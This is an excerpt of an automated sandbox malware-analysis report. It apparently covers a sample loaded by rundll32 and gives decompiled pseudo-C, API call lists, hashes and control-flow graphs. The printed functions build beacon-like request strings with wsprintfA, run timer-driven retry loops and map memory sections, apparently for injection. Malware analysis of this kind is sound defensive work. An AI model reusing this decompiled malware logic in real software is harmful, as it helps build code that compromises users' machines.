                                                          • Opcode ID: 6e31daf4e5f94dd54edd94774e635a10c951bc20b1e151571baaa93159135a00
                                                          • Instruction ID: b41705971b9a5a237de19fab8252afe1f013f61b2bad53d7e4583d6f953c2788
                                                          • Opcode Fuzzy Hash: 6e31daf4e5f94dd54edd94774e635a10c951bc20b1e151571baaa93159135a00
                                                          • Instruction Fuzzy Hash: B2212EB2E00209AFCB11DFA9C8849DEFBF9FF48355F508969E605F7210D7319A488B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05580E3E, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 05580E67
                                                          • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0559081D,00000000,00000000,00000028,00000100), ref: 05580E89
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressMemory64ProcReadVirtualWow64
                                                          • String ID:
                                                          • API String ID: 752694512-0
                                                          • Opcode ID: a3beb8b7b7b12267c3301bd4060320a9202a0eb7cbcce9a4cee42dd7d84c00e1
                                                          • Instruction ID: 79833ff4a6eb78c0569db0f685b243a04e17beca261426e330329a0967b8a4cf
                                                          • Opcode Fuzzy Hash: a3beb8b7b7b12267c3301bd4060320a9202a0eb7cbcce9a4cee42dd7d84c00e1
                                                          • Instruction Fuzzy Hash: F3F04972510109BF8F01CF99DC05C6ABFBAFB84240B15401AF500D2230DB35E959EB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558A8F7, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,0558B8EC,00000000,00000000,0558B8EC,00000000,00000002,00000000,?,?,00000000,0558B8EC,000000FF,00000000), ref: 0558A925
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                          • Instruction ID: fff1f3f4f2fd0630e431f6aa3323fec9ddf39d7adc49ff47d9df6cce22bb4f72
                                                          • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                          • Instruction Fuzzy Hash: 5AF012B690420CFFDB119FA5CC85CAFBBBDEB44254B00886AF552E1050D2319E189B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E57666, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E00E57666(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                          0x00e57678
                                                          0x00e5767e
                                                          0x00e5768c
                                                          0x00e57693
                                                          0x00e57698
                                                          0x00e5769e
                                                          0x00000000
                                                          0x00e5769f
                                                          0x00000000

                                                          APIs
                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00E56F25,00000002,00000000,?,?,00000000,?,?,00E56F25,00000000), ref: 00E57693
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                          • Instruction ID: 57572a5f378c5d7af3ff4cb436cf3f3af0be053dc025656ae6de52e679b4f7cb
                                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                          • Instruction Fuzzy Hash: 1BF082B690420CFFDB119FA5CC84C9FBBBCEB44354B104D39B552E1090D6709E188A60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558F7F5, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0559C300), ref: 0558F80C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 0e9578b05d7783be484768b48a6886ac7c254b4740901699dce0f0497ec3732a
                                                          • Instruction ID: 012964a725f80043334dccc0db73fcf2c53050ef4b688900cb14d442ea999378
                                                          • Opcode Fuzzy Hash: 0e9578b05d7783be484768b48a6886ac7c254b4740901699dce0f0497ec3732a
                                                          • Instruction Fuzzy Hash: 5BF03431B001259BCB20EF59CC85DAABBA9FF09758B418115E901EB260D730E98BCBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E548C2, Relevance: 34.7, APIs: 23, Instructions: 220memorystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          C-Code - Quality: 70%
                                                          			E00E548C2(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0xe5a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xe5a018; // 0x94cfb54a
					asm("bswap eax");
					_t32 =  *0xe5a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xe5a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xe5a00c; // 0x69ab8210
					asm("bswap eax");
					_t35 =  *0xe5a2d4; // 0x435d5a8
					_t2 = _t35 + 0xe5b622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d163, _t34, _t33, _t32, _t31,  *0xe5a02c,  *0xe5a004, _t110);
					_t38 = E00E56A9F();
					_t39 =  *0xe5a2d4; // 0x435d5a8
					_t3 = _t39 + 0xe5b662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xe5a2d4; // 0x435d5a8
						_t7 = _t92 + 0xe5b66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00E52C60(_t99);
					_t44 =  *0xe5a2d4; // 0x435d5a8
					_t9 = _t44 + 0xe5b38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xe5a2d4; // 0x435d5a8
					_t11 = _t48 + 0xe5b33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xe5a32c; // 0x51b95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xe5a2d4; // 0x435d5a8
						_t13 = _t88 + 0xe5b685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xe5a37c; // 0x51b9630
					_a28 = E00E53A66(0xe5a00a, _t105 + 4);
					_t55 =  *0xe5a31c; // 0x51b95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xe5a2d4; // 0x435d5a8
						_t16 = _t84 + 0xe5b8e9; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xe5a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xe5a2d4; // 0x435d5a8
						_t18 = _t81 + 0xe5b8e2; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xe5a290, _t107, 0x800);
						if(_t98 != _t107) {
							E00E52C46(GetTickCount());
							_t62 =  *0xe5a37c; // 0x51b9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0xe5a37c; // 0x51b9630
							__imp__(_t66 + 0x40);
							_t68 =  *0xe5a37c; // 0x51b9630
							_t69 = E00E57156(1, _t103, _t117,  *_t68); // executed
							_t115 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0xe592ac);
								_push(_t115);
								_t108 = E00E55C8D();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00E53097(0xffffffffffffffff, _t98, _v12, _v8); // executed
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00E53546();
									}
									HeapFree( *0xe5a290, 0, _v24);
								}
								HeapFree( *0xe5a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0xe5a290, _t107, _t98);
						}
						HeapFree( *0xe5a290, _t107, _a20);
					}
					RtlFreeHeap( *0xe5a290, _t107, _t117); // executed
				}
				return _v16;
			}






















































                                                          0x00e548c2
                                                          0x00e548d6
                                                          0x00e548d8
                                                          0x00e548e6
                                                          0x00e548ea
                                                          0x00e548f2
                                                          0x00e548fa
                                                          0x00e548fa
                                                          0x00e548fc
                                                          0x00e54908
                                                          0x00e54917
                                                          0x00e5491c
                                                          0x00e5491f
                                                          0x00e54924
                                                          0x00e54927
                                                          0x00e5492c
                                                          0x00e5492f
                                                          0x00e5493b
                                                          0x00e54948
                                                          0x00e5494a
                                                          0x00e54950
                                                          0x00e54955
                                                          0x00e54960
                                                          0x00e54962
                                                          0x00e54965
                                                          0x00e5496b
                                                          0x00e5496d
                                                          0x00e54976
                                                          0x00e54981
                                                          0x00e54983
                                                          0x00e54986
                                                          0x00e54986
                                                          0x00e54988
                                                          0x00e5498f
                                                          0x00e54994
                                                          0x00e549a1
                                                          0x00e549a3
                                                          0x00e549a8
                                                          0x00e549b6
                                                          0x00e549b8
                                                          0x00e549bd
                                                          0x00e549c2
                                                          0x00e549c5
                                                          0x00e549ca
                                                          0x00e549d5
                                                          0x00e549d7
                                                          0x00e549da
                                                          0x00e549da
                                                          0x00e549dc
                                                          0x00e549ef
                                                          0x00e549f3
                                                          0x00e549f8
                                                          0x00e549fc
                                                          0x00e549ff
                                                          0x00e54a04
                                                          0x00e54a0f
                                                          0x00e54a11
                                                          0x00e54a14
                                                          0x00e54a14
                                                          0x00e54a16
                                                          0x00e54a1d
                                                          0x00e54a20
                                                          0x00e54a25
                                                          0x00e54a2f
                                                          0x00e54a31
                                                          0x00e54a38
                                                          0x00e54a50
                                                          0x00e54a54
                                                          0x00e54a60
                                                          0x00e54a65
                                                          0x00e54a6e
                                                          0x00e54a7f
                                                          0x00e54a83
                                                          0x00e54a8c
                                                          0x00e54a92
                                                          0x00e54a9a
                                                          0x00e54a9f
                                                          0x00e54aac
                                                          0x00e54ab2
                                                          0x00e54aba
                                                          0x00e54ac0
                                                          0x00e54ac6
                                                          0x00e54aca
                                                          0x00e54ace
                                                          0x00e54ad4
                                                          0x00e54ad8
                                                          0x00e54adf
                                                          0x00e54ae6
                                                          0x00e54aea
                                                          0x00e54af5
                                                          0x00e54afc
                                                          0x00e54b00
                                                          0x00e54b09
                                                          0x00e54b09
                                                          0x00e54b1a
                                                          0x00e54b1a
                                                          0x00e54b29
                                                          0x00e54b2f
                                                          0x00e54b2f
                                                          0x00e54b39
                                                          0x00e54b39
                                                          0x00e54b4a
                                                          0x00e54b4a
                                                          0x00e54b58
                                                          0x00e54b58
                                                          0x00e54b68

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00E548E0
                                                          • GetTickCount.KERNEL32 ref: 00E548F4
                                                          • wsprintfA.USER32 ref: 00E54943
                                                          • wsprintfA.USER32 ref: 00E54960
                                                          • wsprintfA.USER32 ref: 00E54981
                                                          • wsprintfA.USER32 ref: 00E5499F
                                                          • wsprintfA.USER32 ref: 00E549B4
                                                          • wsprintfA.USER32 ref: 00E549D5
                                                          • wsprintfA.USER32 ref: 00E54A0F
                                                          • wsprintfA.USER32 ref: 00E54A2F
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00E54A4A
                                                          • GetTickCount.KERNEL32 ref: 00E54A5A
                                                          • RtlEnterCriticalSection.NTDLL(051B95F0), ref: 00E54A6E
                                                          • RtlLeaveCriticalSection.NTDLL(051B95F0), ref: 00E54A8C
                                                            • Part of subcall function 00E57156: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57181
                                                            • Part of subcall function 00E57156: lstrlen.KERNEL32(00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57189
                                                            • Part of subcall function 00E57156: strcpy.NTDLL ref: 00E571A0
                                                            • Part of subcall function 00E57156: lstrcat.KERNEL32(00000000,00000000), ref: 00E571AB
                                                            • Part of subcall function 00E57156: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E571C8
                                                          • StrTrimA.SHLWAPI(00000000,00E592AC,00000000,051B9630), ref: 00E54ABA
                                                            • Part of subcall function 00E55C8D: lstrlen.KERNEL32(051B887A,00000000,00000000,00000000,00E54AC6,00000000), ref: 00E55C9D
                                                            • Part of subcall function 00E55C8D: lstrlen.KERNEL32(?), ref: 00E55CA5
                                                            • Part of subcall function 00E55C8D: lstrcpy.KERNEL32(00000000,051B887A), ref: 00E55CB9
                                                            • Part of subcall function 00E55C8D: lstrcat.KERNEL32(00000000,?), ref: 00E55CC4
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 00E54AD8
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E54AE6
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E54AEA
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00E54B1A
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00E54B29
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,051B9630), ref: 00E54B39
                                                          • HeapFree.KERNEL32(00000000,?), ref: 00E54B4A
                                                          • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00E54B58
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                                          • String ID:
                                                          • API String ID: 1837416118-0
                                                          • Opcode ID: f421fc413b21a3697f4393c07f72dbaba7c24ed3bb67548f2c4ad9984be17142
                                                          • Instruction ID: 500be12196eadf1d77ec481482321f91350b21d2fd6d16a6c36fc97c46be3b30
                                                          • Opcode Fuzzy Hash: f421fc413b21a3697f4393c07f72dbaba7c24ed3bb67548f2c4ad9984be17142
                                                          • Instruction Fuzzy Hash: 6B718072500304AFC765DB66DC49E9A77ECEB48306F090D25F909F3271E635E90D9B62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E550A3, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149timememoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 138 e550a3-e550cf memset CreateWaitableTimerA 139 e550d5-e55125 _allmul SetWaitableTimer WaitForMultipleObjects 138->139 140 e5522f-e55235 GetLastError 138->140 142 e55127-e5512a 139->142 143 e5519f-e551a4 139->143 141 e55238-e5523f 140->141 144 e55135 142->144 145 e5512c call e55335 142->145 146 e551a5-e551a9 143->146 147 e5513f 144->147 153 e55131-e55133 145->153 149 e551b9-e551bd 146->149 150 e551ab-e551b3 RtlFreeHeap 146->150 152 e55142-e55146 147->152 149->146 151 e551bf-e551c8 CloseHandle 149->151 150->149 151->141 154 e55158-e55180 call e55242 152->154 155 e55148-e5514f 152->155 153->144 153->147 159 e55182-e5518b 154->159 160 e551ca-e551cf 154->160 155->154 156 e55151 155->156 156->154 159->152 163 e5518d-e55197 call e574cb 159->163 161 e551d1-e551d7 160->161 162 e551ee-e551f6 160->162 161->143 164 e551d9-e551ec call e53546 161->164 165 e551fc-e55224 _allmul SetWaitableTimer WaitForMultipleObjects 162->165 169 e5519c 163->169 164->165 165->152 168 e5522a 165->168 168->143 169->143
                                                          C-Code - Quality: 83%
                                                          			E00E550A3(intOrPtr __edx, intOrPtr _a4, char _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				long _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xe5a298);
					_v20 = 0;
					_v16 = 0;
					L00E57DDC();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xe5a2c4; // 0x2ec
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xe5a2a4 = 5;
						} else {
							_t69 = E00E55335(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xe5a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t20 =  &_v16; // 0xe54579
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00E55242( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76, _t20); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t30 =  &_a8; // 0xe54579
							_t68 = E00E574CB(_t73, _t90,  &_v92, _a4,  *_t30); // executed
							_v8.LowPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xe5a29c);
							goto L21;
						} else {
							__eflags =  *0xe5a2a0; // 0x1
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00E53546();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xe5a2a0);
								L21:
								L00E57DDC();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							RtlFreeHeap( *0xe5a290, 0, _t54); // executed
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}





























                                                          0x00e550a3
                                                          0x00e550b5
                                                          0x00e550b8
                                                          0x00e550c4
                                                          0x00e550cc
                                                          0x00e550cf
                                                          0x00e55235
                                                          0x00e550d5
                                                          0x00e550d5
                                                          0x00e550d7
                                                          0x00e550dc
                                                          0x00e550dd
                                                          0x00e550e3
                                                          0x00e550e6
                                                          0x00e550e9
                                                          0x00e550f7
                                                          0x00e55102
                                                          0x00e55105
                                                          0x00e55107
                                                          0x00e55114
                                                          0x00e5511e
                                                          0x00e55122
                                                          0x00e55125
                                                          0x00e5512a
                                                          0x00e55135
                                                          0x00e55135
                                                          0x00e5512c
                                                          0x00e5512c
                                                          0x00e55133
                                                          0x00000000
                                                          0x00000000
                                                          0x00e55133
                                                          0x00e5513f
                                                          0x00000000
                                                          0x00e55142
                                                          0x00e55146
                                                          0x00e55151
                                                          0x00e55151
                                                          0x00e55158
                                                          0x00e5515d
                                                          0x00e55160
                                                          0x00e55164
                                                          0x00e5516d
                                                          0x00e55173
                                                          0x00e55176
                                                          0x00e5517d
                                                          0x00e55180
                                                          0x00000000
                                                          0x00000000
                                                          0x00e55182
                                                          0x00e55185
                                                          0x00e55188
                                                          0x00e5518b
                                                          0x00000000
                                                          0x00e5518d
                                                          0x00e5518d
                                                          0x00e55197
                                                          0x00e5519c
                                                          0x00e5519c
                                                          0x00000000
                                                          0x00e551ca
                                                          0x00e551ca
                                                          0x00e551cf
                                                          0x00e551ee
                                                          0x00e551f0
                                                          0x00e551f5
                                                          0x00e551f6
                                                          0x00000000
                                                          0x00e551d1
                                                          0x00e551d1
                                                          0x00e551d7
                                                          0x00000000
                                                          0x00e551d9
                                                          0x00e551d9
                                                          0x00e551de
                                                          0x00e551e0
                                                          0x00e551e5
                                                          0x00e551e6
                                                          0x00e551fc
                                                          0x00e551fc
                                                          0x00e55204
                                                          0x00e5520f
                                                          0x00e55212
                                                          0x00e5521d
                                                          0x00e5521f
                                                          0x00e55221
                                                          0x00e55224
                                                          0x00000000
                                                          0x00e5522a
                                                          0x00000000
                                                          0x00e5522a
                                                          0x00e55224
                                                          0x00e551d7
                                                          0x00000000
                                                          0x00e551cf
                                                          0x00e5519f
                                                          0x00e551a1
                                                          0x00e551a4
                                                          0x00e551a5
                                                          0x00e551a5
                                                          0x00e551a9
                                                          0x00e551b3
                                                          0x00e551b3
                                                          0x00e551b9
                                                          0x00e551bc
                                                          0x00e551bc
                                                          0x00e551c2
                                                          0x00e551c2
                                                          0x00e5523f
                                                          0x00000000

                                                          APIs
                                                          • memset.NTDLL ref: 00E550B8
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00E550C4
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00E550E9
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 00E55105
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E5511E
                                                          • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00E551B3
                                                          • CloseHandle.KERNEL32(?), ref: 00E551C2
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00E551FC
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,yE), ref: 00E55212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E5521D
                                                            • Part of subcall function 00E55335: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,051B9318,00000000,?,7519F710,00000000,7519F730), ref: 00E55384
                                                            • Part of subcall function 00E55335: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,051B9350,?,00000000,30314549,00000014,004F0053,051B930C), ref: 00E55421
                                                            • Part of subcall function 00E55335: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00E55131), ref: 00E55433
                                                          • GetLastError.KERNEL32 ref: 00E5522F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID: yE$yE
                                                          • API String ID: 3521023985-2374382181
                                                          • Opcode ID: 6a99766cd69b2bd5c43b48ab04ee4d387d46106ee616c222848f2dc0e4cf91d8
                                                          • Instruction ID: f94d11a81926200729b4bbb340089b9d7d716052ec064355a00572af74625fae
                                                          • Opcode Fuzzy Hash: 6a99766cd69b2bd5c43b48ab04ee4d387d46106ee616c222848f2dc0e4cf91d8
                                                          • Instruction Fuzzy Hash: 7C519076801A28EECF109F95DD44AEEBFBCEF05326F205A15F915F21A0D7704A48CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05588323, Relevance: 22.6, APIs: 15, Instructions: 130memorysynchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
